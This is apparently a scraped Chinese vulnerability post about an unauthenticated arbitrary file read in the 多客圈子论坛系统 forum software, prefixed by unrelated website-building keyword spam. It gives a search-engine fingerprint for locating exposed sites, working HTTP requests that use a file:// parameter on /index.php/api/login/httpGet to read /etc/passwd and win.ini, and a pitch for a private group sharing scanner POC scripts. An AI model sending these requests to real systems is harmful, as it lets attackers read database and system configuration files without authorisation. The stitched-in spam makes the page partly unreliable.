做网站横幅用什么软件好,网站建设微信版,网站建设需要写语句吗,佛山南海网站建设0x01 产品简介
多客圈子论坛系统是一种面向特定人群或特定话题的社交网络#xff0c;它提供了用户之间交流、分享、讨论的平台。在这个系统中#xff0c;用户可以创建、加入不同的圈子#xff0c;圈子可以是基于兴趣、地域、职业等不同主题的。用户可以在圈子中发帖、评论、…0x01 产品简介
多客圈子论坛系统是一种面向特定人群或特定话题的社交网络它提供了用户之间交流、分享、讨论的平台。在这个系统中用户可以创建、加入不同的圈子圈子可以是基于兴趣、地域、职业等不同主题的。用户可以在圈子中发帖、评论、点赞等互动。社交圈子论坛系统除了提供基本的社交功能外还可以根据用户行为和兴趣为用户推荐相关内容。
0x02 漏洞概述
多客圈子论坛系统 /index.php/api/login/httpGet 接口处存在任意文件读取漏洞未经身份验证攻击者可通过该漏洞读取系统重要文件如数据库配置文件、系统配置文件等)导致网站处于极度不安全状态。
0x03 搜索引擎
body/static/index/js/jweixin-1.2.0.js0x04 漏洞复现
linux
GET /index.php/api/login/httpGet?urlfile:///etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alivewindows
GET /index.php/api/login/httpGet?urlfile://C:/windows/win.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive0x05 工具批量
nuclei afrog xray POC脚本获取
请使用VX扫一扫加入内部POC脚本分享圈子